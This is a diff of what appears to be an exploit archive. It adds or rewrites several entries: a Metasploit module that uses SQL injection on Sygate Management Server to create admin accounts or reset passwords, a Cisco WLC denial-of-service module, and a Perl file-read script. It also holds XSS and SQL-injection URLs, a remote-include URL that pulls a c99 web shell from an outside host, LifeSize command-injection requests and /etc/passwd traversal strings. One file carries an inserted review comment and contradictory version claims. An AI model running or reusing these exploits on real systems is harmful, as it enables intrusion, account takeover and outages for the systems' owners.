- );
-
- if ($s->IsError){
- $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
- return;
- }
-
- $self->PrintLine("[*] Establishing a connection to the target...");
- $self->PrintLine(' ');
- $s->Send($request);
- my $results = $s->Recv(-1, 20);
-
- if ($results =~ /HTTP\/1\.. 200 OK/im) {
- # Seems to be fine ;-)
- $self->PrintLine("OK. Now try to log with user '$login' and passwd '$passwd'");
- } else {
- $self->PrintLine("Doh ! Are you sure this server is vulnerable ?");
- }
-
- $s->Close();
- return;
-}
-
-sub URLEncode {
- my $self = shift;
- my $data = shift;
- my $res;
-
- foreach my $c (unpack('C*', $data)) {
- if (
- ($c >= 0x30 && $c <= 0x39) ||
- ($c >= 0x41 && $c <= 0x5A) ||
- ($c >= 0x61 && $c <= 0x7A)
- ) {
- $res .= chr($c);
- } else {
- $res .= sprintf("%%%.2x", $c);
- }
- }
- return $res;
-}
-
-sub VHost {
- my $self = shift;
- my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
- return $name;
-}
-
-1;
-
-# milw0rm.com [2006-04-15]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+##
+#
+# Affected product : Sygate Management Server v4.1 (at least)
+#
+# Vulnerability : SQL-Injection in login page
+# Required privs : Network access to the admin interface (HTTP)
+# Impact : Raw access to the database
+# Sample payload : Create a valid admin account directly in the database
+#
+# Editor status : Official patch available
+# http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html
+#
+##
+
+package Msf::Exploit::sygate_policy_manager;
+use base "Msf::Exploit";
+use strict;
+use Pex::Text;
+use bytes;
+use vars qw{$HAS_SHA1};
+
+BEGIN
+{
+ $HAS_SHA1 = 0;
+
+ if (eval('require Digest::SHA1')) {
+ eval('use Digest::SHA1 qw(sha1);');
+ $HAS_SHA1 = 1;
+ }
+}
+
+my $advanced = { };
+
+my $info = {
+ 'Name' => 'Sygate Management Server SQL Injection',
+ 'Version' => '$Revision: 1.3 $',
+ 'Authors' => [ 'Nicob ' ],
+ 'Arch' => [ 'x86' ],
+ 'OS' => [ 'win32' ],
+ 'Priv' => 0,
+ 'UserOpts' =>
+ {
+ 'RHOST' => [1, 'ADDR', 'The target address'],
+ 'RPORT' => [1, 'PORT', 'The target port', 80],
+ 'VHOST' => [0, 'DATA', 'The virtual host name of the server'],
+ 'LOGIN' => [0, 'LOGIN', 'The username to create/modify', 'reporting'],
+ 'PASSWD' => [0, 'PASSWD', 'The encrypted password of this user', 'my_passwd'],
+ 'SERVLET' => [1, 'DATA', 'Full path of the servlet', '/servlet/Sygate.Servlet.login'],
+ 'SSL' => [0, 'BOOL', 'Use SSL'],
+ },
+
+ 'Description' => Pex::Text::Freeform(qq{
+ This module exploits a non authenticated SQL-Injection vulnerability in the
+ Sygate Management Server (now Symantec Policy Manager), in order to create a new
+ admin account or change the password of an existing one. Version 4.1 is known to be vulnerable.
+ Version 5 is not vulnerable.
+}),
+
+ 'Refs' =>
+ [
+ ['URL', 'http://securityresponse.symantec.com/avcenter/security/Content/2006.02.01.html'],
+ ['CVE', '2006-0522'],
+ ['OSVDB', '22883'],
+ ['BID', '16452'],
+ ],
+
+ 'Targets' =>
+ [
+ ['Change a specific users password', 'change_user_passwd'],
+ ['Create a new administrative account', 'add_account'],
+ ['Reset all passwords (denial of service)', 'reset_all'],
+ ],
+
+ 'DefaultTarget' => 0,
+
+ 'Keys' => ['sygate'],
+
+ };
+
+sub new {
+ my $class = shift;
+ my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+ return($self);
+}
+
+sub Check {
+ my $self = shift;
+ my $target_host = $self->GetVar('RHOST');
+ my $vhost = $self->VHost;
+ my $target_port = $self->GetVar('RPORT');
+ my $servlet = $self->GetVar('SERVLET');
+
+ my $request =
+ "GET $servlet?uid=test1&up=test2 HTTP/1.1\r\n".
+ "Accept: */*\r\n".
+ "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
+ "Host: $vhost:$target_port\r\n".
+ "Connection: Close\r\n".
+ "\r\n";
+
+ my $s = Msf::Socket::Tcp->new(
+ 'PeerAddr' => $target_host,
+ 'PeerPort' => $target_port,
+ 'SSL' => $self->GetVar('SSL'),
+ );
+
+ if ($s->IsError){
+ $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+ return $self->CheckCode('Connect');
+ }
+
+ $self->PrintLine("[*] Establishing a connection to the target...");
+
+ $s->Send($request);
+ my $results = $s->Recv(-1, 20);
+ $s->Close();
+
+ if ($results =~ /HTTP\/1\..\s+200/) {
+
+ $self->PrintLine("[*] Vulnerable server detected!");
+ return $self->CheckCode('Confirmed');
+
+ } elsif ($results =~ /HTTP\/1\..\s+([345]\d+)/) {
+
+ $self->PrintLine("[*] The Sygate Policy Manager servlet was not found.");
+ return $self->CheckCode('Safe');
+ }
+
+ $self->PrintLine("[*] Generic error...");
+ return $self->CheckCode('Generic');
+}
+
+sub Exploit {
+ my $self = shift;
+ my $target_host = $self->GetVar('RHOST');
+ my $vhost = $self->VHost;
+ my $target_port = $self->GetVar('RPORT');
+ my $servlet = $self->GetVar('SERVLET');
+ my $login = $self->GetVar('LOGIN');
+ my $passwd = $self->GetVar('PASSWD');
+ my $target = $self->Targets->[$self->GetVar('TARGET')];
+
+ if (! $HAS_SHA1) {
+ $self->PrintLine("[*] Please install the Digest-SHA1 module to use this exploit");
+ return;
+ }
+
+ # The 'Password' field is a hex-encoded SHA-1 digest of the "user+password" string
+ my $sha1 = sha1($login.$passwd);
+ $sha1 =~ s/./sprintf("%02x", ord($&))/ges;
+ $sha1 = "0x".uc($sha1);
+
+ # Maximum level of privileges
+ my $privs = "255";
+
+
+ my %sqlpayloads =
+ (
+ # Create a new valid admin account (in SMS v4.1) -- [BUG] : Can't access the Users panel :-(
+ 'add_account' =>
+ "insert into CMS35.Admin (RecUpdateTime,LoginName,AdminNickName,Password,AdminRights,".
+ "AdminEmail,FailedLogin,AlertOnFailure,AlertFailureThreshold,OnlineState) ".
+ "values (getutcdate(),'$login','$login',$sha1,'$privs','',0,0,0,0)",
+
+ # Reset the password of every account to "0x4141" (in SMS v4.1) -- Denial of Service only !
+ 'reset_all' =>
+ "update CMS35.Admin set Password=cast('AA' as varbinary)",
+
+ # Change the password of the selected account (in SMS v4.1) -- Yeah, full access to 'admin' !
+ 'change_user_passwd' =>
+ "update CMS35.Admin set Password=$sha1 where LoginName='$login'",
+ );
+
+ my $payload = $sqlpayloads{ $target->[1] };
+
+ # Inject our payload
+ $servlet = $servlet."?uid=".$self->URLEncode("';$payload -- ")."&up=foo";
+
+ my $request =
+ "GET $servlet HTTP/1.1\r\n".
+ "Accept: */*\r\n".
+ "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n".
+ "Host: $vhost:$target_port\r\n".
+ "Connection: Close\r\n".
+ "\r\n";
+
+ my $s = Msf::Socket::Tcp->new(
+ 'PeerAddr' => $target_host,
+ 'PeerPort' => $target_port,
+ 'SSL' => $self->GetVar('SSL'),
+ );
+
+ if ($s->IsError){
+ $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
+ return;
+ }
+
+ $self->PrintLine("[*] Establishing a connection to the target...");
+ $self->PrintLine(' ');
+ $s->Send($request);
+ my $results = $s->Recv(-1, 20);
+
+ if ($results =~ /HTTP\/1\.. 200 OK/im) {
+ # Seems to be fine ;-)
+ $self->PrintLine("OK. Now try to log with user '$login' and passwd '$passwd'");
+ } else {
+ $self->PrintLine("Doh ! Are you sure this server is vulnerable ?");
+ }
+
+ $s->Close();
+ return;
+}
+
+sub URLEncode {
+ my $self = shift;
+ my $data = shift;
+ my $res;
+
+ foreach my $c (unpack('C*', $data)) {
+ if (
+ ($c >= 0x30 && $c <= 0x39) ||
+ ($c >= 0x41 && $c <= 0x5A) ||
+ ($c >= 0x61 && $c <= 0x7A)
+ ) {
+ $res .= chr($c);
+ } else {
+ $res .= sprintf("%%%.2x", $c);
+ }
+ }
+ return $res;
+}
+
+sub VHost {
+ my $self = shift;
+ my $name = $self->GetVar('VHOST') || $self->GetVar('RHOST');
+ return $name;
+}
+
+1;
+
+# milw0rm.com [2006-04-15]
diff --git a/platforms/cgi/webapps/32430.txt b/platforms/cgi/webapps/32430.txt
new file mode 100755
index 000000000..4e01b033d
--- /dev/null
+++ b/platforms/cgi/webapps/32430.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31436/info
+
+WhoDomLite is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+WhoDomLite 1.1.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/wholite.cgi?dom= xss_code &tld=com&action=search
\ No newline at end of file
diff --git a/platforms/hardware/dos/9268.rb b/platforms/hardware/dos/9268.rb
index 0166e7df1..6b4cdcd8e 100755
--- a/platforms/hardware/dos/9268.rb
+++ b/platforms/hardware/dos/9268.rb
@@ -1,52 +1,52 @@ -require 'msf/core' - - -class Metasploit3 < Msf::Auxiliary - - include Msf::Exploit::Remote::Tcp - include Msf::Auxiliary::Dos - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Cisco WLC 4200 Basic Auth Denial of Service', - 'Description' => %q{ - - This module triggers a Denial of Service condition in the Cisco WLC 4200 - HTTP server. By sending a GET request with long authentication data, the - device becomes unresponsive and reboots. Firmware is reportedly vulnerable. - }, - 'Author' => [ 'Christoph Bott ' ], - 'License' => MSF_LICENSE, - 'Version' => '$Revision: 5949 $', - 'References' => - [ - [ 'BID', '???'], - [ 'CVE', '???'], - [ 'URL', 'http://www.cisco.com/?????'], - ], - 'DisclosureDate' => 'January 26 2009')) - - register_options( - [ - Opt::RPORT(80), - ], self.class) - - end - - def run - connect - - print_status("Sending HTTP DoS packet") - - sploit = - "GET /screens/frameset.html HTTP/1.0\r\n" + - "Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0" - - sock.put(sploit + "\r\n") - - disconnect - end - -end - -# milw0rm.com [2009-07-27] +require 'msf/core' + + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Cisco WLC 4200 Basic Auth Denial of Service', + 'Description' => %q{ + + This module triggers a Denial of Service condition in the Cisco WLC 4200 + HTTP server. By sending a GET request with long authentication data, the + device becomes unresponsive and reboots. Firmware is reportedly vulnerable. 
+ }, + 'Author' => [ 'Christoph Bott ' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 5949 $', + 'References' => + [ + [ 'BID', '???'], + [ 'CVE', '???'], + [ 'URL', 'http://www.cisco.com/?????'], + ], + 'DisclosureDate' => 'January 26 2009')) + + register_options( + [ + Opt::RPORT(80), + ], self.class) + + end + + def run + connect + + print_status("Sending HTTP DoS packet") + + sploit = + "GET /screens/frameset.html HTTP/1.0\r\n" + + "Authorization: Basic MTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDoxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwMTIzNDU2Nzg5MDEyMzQ1Njc4OTAxMjM0" + + sock.put(sploit + "\r\n") + + disconnect + end + +end + +# milw0rm.com [2009-07-27] diff --git a/platforms/jsp/webapps/32423.txt b/platforms/jsp/webapps/32423.txt new file mode 100755 index 000000000..1fd21e44e --- /dev/null +++ b/platforms/jsp/webapps/32423.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/31410/info + +OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Versions prior to OpenNMS 1.5.94 are vulnerable. + +http://www.example.com/opennms/j_acegi_security_check?j_username=test'>&j_password=test \ No newline at end of file diff --git a/platforms/jsp/webapps/32424.txt b/platforms/jsp/webapps/32424.txt new file mode 100755 index 000000000..0ad5f9f64 --- /dev/null +++ b/platforms/jsp/webapps/32424.txt 
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31410/info
+
+OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to OpenNMS 1.5.94 are vulnerable.
+
+http://www.example.com/opennms/notification/list.jsp?username=%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E
\ No newline at end of file
diff --git a/platforms/jsp/webapps/32425.txt b/platforms/jsp/webapps/32425.txt
new file mode 100755
index 000000000..23dd1ec9a
--- /dev/null
+++ b/platforms/jsp/webapps/32425.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31410/info
+
+OpenNMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to OpenNMS 1.5.94 are vulnerable.
+
+http://www.example.com/opennms/event/list?sortby=id&limit=10&filter=msgsub%3D%3Cscript%3Ealert%28%27hi%27%29%3B%3C%2Fscript%3E&filter=iplike%3D*.*.*.*
\ No newline at end of file
diff --git a/platforms/php/webapps/32418.txt b/platforms/php/webapps/32418.txt
new file mode 100755
index 000000000..c481acf45
--- /dev/null
+++ b/platforms/php/webapps/32418.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/31401/info
+
+EasyRealtorPRO is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc&page=2&item=5'SQL INJECTION
+
+http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type&search_ordermethod=asc'SQL INJECTION&page=2&item=5
+
+http://www.example.com/site_search.php?search_purpose=sale&search_type=&search_price_min=&search_price_max=&search_bedroom=1&search_bathroom=1&search_city=&search_state=&search_zip=&search_radius=&search_country=&search_order=type'SQL INJECTION&search_ordermethod=asc&page=2&item=5
diff --git a/platforms/php/webapps/32419.pl b/platforms/php/webapps/32419.pl
new file mode 100755
index 000000000..a8e5ae8d1
--- /dev/null
+++ b/platforms/php/webapps/32419.pl
@@ -0,0 +1,101 @@ +source: http://www.securityfocus.com/bid/31403/info + +Libra File Manager is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks. + +Libra File Manager 2.0 and prior versions are available. + +#! /usr/bin/perl + +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +# Libra PHP File Manager <= 1.18 / Local File Inclusion Vulnerability +# -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +# Program: Libra PHP File Manager +# Version: <= 1.18 +# File affected: fileadmin.php +# Download: http://file.sourceforge.net +# +# +# Found by Pepelux +# eNYe-Sec - www.enye-sec.org +# Greetings to Ka0x for help me with the perl code :) +# +# You can scale directories and read any file that you have permissions + +use LWP::UserAgent; +$ua = LWP::UserAgent->new; + +print "\e[2J"; +system(($^O eq 'MSWin32') ? 'cls' : 'clear'); + +my ($host, $path, $action) = @ARGV ; + +unless($ARGV[2]) { + print "Usage: perl $0 \n"; + print "\tex: perl $0 http://www.example.com /etc/ list\n"; + print "\tex: perl $0 http://www.example.com /etc/passwd edit\n"; + print "Actions:\n"; + print " list:\n"; + print " edit:\n\n"; + exit 1; +} + +$ua->agent("$0/0.1 " . 
$ua->agent); +$host = "http://".$host if ($host !~ /^http:/); +$path = $path."/" if ($action eq "list" && $path !~ /\/$/); +$op = "home" if ($action == "list"); + +if ($action eq "edit") { + $aux = $path; + $directory = ""; + + do { + $x = index($aux, "/"); + $y = length($aux) - $x; + $directory .= substr($aux, 0, $x+1); + $aux = substr($aux, $x+1, $y); + } until ($x == -1); + + $path = $directory; + $file = $aux; + $op = "edit"; +} + +$url = $host."/fileadmin.php?user=root&isadmin=yes&op=".$op."&folder=".$path; +$url .= "&fename=".$file if ($action eq "edit"); + +$req = HTTP::Request->new(GET => $url); +$req->header('Accept' => 'text/html'); + +$res = $ua->request($req); + +if ($res->is_success) { + $result = $res->content; + + if ($action eq "edit") { + print "Viewing $path$file:\n"; + print $1,"\n" if($result =~ /name="ncontent">(.*)<\/textarea>/s); + } + else { + print "Files in $path:\n"; + $x = index($result, "Files:") + 6; + $result = substr($result, $x, length($result)-$x); + $result =~ s/<[^>]*>//g; + $result =~ s/Filename//g; + $result =~ s/Size//g; + $result =~ s/Edit//g; + $result =~ s/Rename//g; + $result =~ s/Delete//g; + $result =~ s/Move//g; + $result =~ s/View//g; + $result =~ s/Open//g; + $result =~ s/\d*//g; + $result =~ s/\s+/\n/g; + $x = index($result, "Copyright"); + $result = substr($result, 0, $x); + print $result; + } +} +else { print "Error: " . $res->status_line . "\n";} diff --git a/platforms/php/webapps/32421.html b/platforms/php/webapps/32421.html new file mode 100755 index 000000000..02f136a64 --- /dev/null +++ b/platforms/php/webapps/32421.html 
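Review bot: `$op = "home" if ($action == "list");` compares two strings with the numeric `==`, which coerces both operands to 0 and is therefore always true (and warns under `use warnings`); the intended test is `$op = "home" if ($action eq "list");`, matching the `eq` comparisons on the neighbouring lines. The mistake is only masked because the `edit` branch below unconditionally reassigns `$op`. The affected-version statements in this file also disagree: the advisory prose says "Libra File Manager 2.0 and prior versions are available" (presumably meaning "are vulnerable"), while the script header says `<= 1.18`, so a reader triaging this record cannot tell which range is actually claimed.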
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31407/info
+
+FlatPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to FlatPress 0.804.1 are vulnerable.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/32422.txt b/platforms/php/webapps/32422.txt
new file mode 100755
index 000000000..f5b1aa5c3
--- /dev/null
+++ b/platforms/php/webapps/32422.txt
@@ -0,0 +1,13 @@
+source: http://www.securityfocus.com/bid/31408/info
+
+Vikingboard is prone to an unauthorized-access vulnerability.
+
+Successfully exploiting this issue can allow attackers to register and log in as existing users.
+
+Vikingboard 0.2 Beta is vulnerable; other versions may also be affected.
+
+The following example account registration data is available:
+
+Username: [username][whitespace characters]NULL
+Password: [password]
+E-Mail: [E-Mail]
\ No newline at end of file
diff --git a/platforms/php/webapps/32427.txt b/platforms/php/webapps/32427.txt
new file mode 100755
index 000000000..6407c270d
--- /dev/null
+++ b/platforms/php/webapps/32427.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/31419/info
+
+Barcode Generator is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
+
+Barcode Generator 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/barcodegen.1d-php4.v2.0.0/class/LSTable.php?class_dir=http://example2.com/shell/c99.txt?
\ No newline at end of file
diff --git a/platforms/php/webapps/32431.txt b/platforms/php/webapps/32431.txt
new file mode 100755
index 000000000..bde34f0ba
--- /dev/null
+++ b/platforms/php/webapps/32431.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31437/info
+
+Lyrics Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/search_results.php?k= XSS_CODE
\ No newline at end of file
diff --git a/platforms/php/webapps/32432.txt b/platforms/php/webapps/32432.txt
new file mode 100755
index 000000000..63ca95f60
--- /dev/null
+++ b/platforms/php/webapps/32432.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/31438/info
+
+Clickbank Portal is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following example is available:
+
+http://www.example.com/search.php
+in search box code Xss
\ No newline at end of file
diff --git a/platforms/php/webapps/32433.txt b/platforms/php/webapps/32433.txt
new file mode 100755
index 000000000..3f081d7ac
--- /dev/null
+++ b/platforms/php/webapps/32433.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/31441/info
+
+Membership Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/stuffs.php?category= XSS_CODE
+
+http://www.example.com/search.php
+in search box code Xss
\ No newline at end of file
diff --git a/platforms/php/webapps/32434.txt b/platforms/php/webapps/32434.txt
new file mode 100755
index 000000000..c913a470a
--- /dev/null
+++ b/platforms/php/webapps/32434.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/31442/info
+
+Recipe Script is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/search.php?keyword= XSS_HACKING
\ No newline at end of file
diff --git a/platforms/php/webapps/32437.txt b/platforms/php/webapps/32437.txt
new file mode 100755
index 000000000..877ffa939
--- /dev/null
+++ b/platforms/php/webapps/32437.txt
@@ -0,0 +1,82 @@
+LifeSize UVC 1.2.6 authenticated vulnerabilities
+
+RCE as www-data:
+
+POST /server-admin/operations/diagnose/ping/ HTTP/1.1
+Host: 172.31.16.99
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://172.31.16.99/server-admin/operations/diagnose/ping/
+Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 118
+
+csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=goo`whoami`gle.com
+
+The above POST results in a response containing:
+ping: unknown host goowww-datagle.com
+ + + + + +RCE as www-data: + +POST /server-admin/operations/diagnose/trace/ HTTP/1.1 +Host: 172.31.16.99 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://172.31.16.99/server-admin/operations/diagnose/trace/ +Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 101 + +csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com + +Results in the following error: +gowww-dataogle.com: Name or service not known + + + + + + +RCE as www-data: + +POST /server-admin/operations/diagnose/dns/ HTTP/1.1 +Host: 172.31.16.99 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://172.31.16.99/server-admin/operations/diagnose/dns/ +Cookie: csrftoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx; sessionid=2872e94ecc65c01161fb19e9f45da579 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 116 + +csrfmiddlewaretoken=Zqr2Z7zw2yNuD7aSGQ8JwtIgcTDOhsHx&source_ip=172.31.16.99&destination_ip=go`whoami`ogle.com&query_type=ANY + +Results in the following results: +; <<>> DiG 9.7.0-P1 <<>> -t ANY gowww-dataogle.com -b 172.31.16.99 +;; global options: +cmd +;; Got answer: +;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54663 +;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0 + +;; QUESTION SECTION: +;gowww-dataogle.com. IN ANY + +;; AUTHORITY SECTION: +com. 890 IN SOA a.gtld-servers.net. nstld.verisign-grs.com. 
1395411948 1800 900 604800 86400 + +;; Query time: 21 msec +;; SERVER: 8.8.8.8#53(8.8.8.8) +;; WHEN: Fri Mar 21 10:26:21 2014 +;; MSG SIZE rcvd: 109 \ No newline at end of file diff --git a/platforms/php/webapps/5762.txt b/platforms/php/webapps/5762.txt index 4d04c8c65..fc7cad67e 100755 --- a/platforms/php/webapps/5762.txt +++ b/platforms/php/webapps/5762.txt @@ -1,19 +1,19 @@ --------------------------------------- -Pro Manager 0.73 Local File Inclusion Vuln --------------------------------------- -http://www.sfr-fresh.com/unix/privat/proManager-0.73.tar.gz --------------------------------------- -By : Stack - -email : Wanted --------------------------------------- -Exploit : -http://localhost/path/inc/config.php?language=../../../../[without php extention] -http://localhost/path/inc/config.php?language=../../../../etc/passwd%00 --------------------------------------- -thnx allah -Greats to all arabians haxors :d -D-S.Morocco Is The Best :d -Waiting - -# milw0rm.com [2008-06-09] +-------------------------------------- +Pro Manager 0.73 Local File Inclusion Vuln +-------------------------------------- +http://www.sfr-fresh.com/unix/privat/proManager-0.73.tar.gz +-------------------------------------- +By : Stack + +email : Wanted +-------------------------------------- +Exploit : +http://localhost/path/inc/config.php?language=../../../../[without php extention] +http://localhost/path/inc/config.php?language=../../../../etc/passwd%00 +-------------------------------------- +thnx allah +Greats to all arabians haxors :d +D-S.Morocco Is The Best :d +Waiting + +# milw0rm.com [2008-06-09] diff --git a/platforms/php/webapps/8820.txt b/platforms/php/webapps/8820.txt index 7ddde905e..c340b882c 100755 --- a/platforms/php/webapps/8820.txt +++ b/platforms/php/webapps/8820.txt 
@@ -1,216 +1,216 @@ -AMember - Multiple Vulnerabilities - -Version Affected: 3.1.7 (Apr-10-2009) (newest) - -Info: aMember is a flexible membership and subscription management PHP script. It has support for -PayPal, BeanStream, 2Checkout, NoChex, VeriSign PayFlow, Authorize.Net, PaySystems, Probilling, -Multicards, E-Gold and Clickbank payment systems (see list of integrated payment systems) and -allows you to setup paid-membership areas on your site. It can also be used without any payment -system - you can manage users manually. - -aMember Pro also supports integration plugins to link users database with third-party scripts, -for example vBulletin, Joomla, WordPress (see list of integration plugins). -aMember is a perfect membership software for selling digital subscriptions and downloads. - -Opinion: CGI Systems' website has an XSS issue too, they obviously don't realise the impact of XSS. - -Credits: Matt, fiftysixer, mind_warlock, fourthdimension, NetRolller3D, ha.ckers, webDEViL and all of InterN0T :) - -Accurate Googled0rk: (fewer results) -http://lmgtfy.com/?q=inurl:/amember intext:© CGI-Central.NET, 2002-2006 - -Inaccurate Googled0rk: (more results) -http://lmgtfy.com/?q=intext:© CGI-Central.NET, 2002-2006 - -External Links: -http://www.amember.com/ -http://www.amember.com/p/Main/Download -http://www.amember.com/p/Main/Demo - - --:: The Advisory ::- - -Version Information: -http://www.website.tld/amember/docs/changelog.txt - -Information Disclosure: -http://www.website.tld/amember/docs/tester.php -http://www.website.tld/amember/setup.php?step=' -http://www.website.tld/amember/admin/report.php?report=' (admin only) -- More files are affected. (discloses full path to the file) - -Cross Site Scripting (admin only - might not survive a login screen!) 
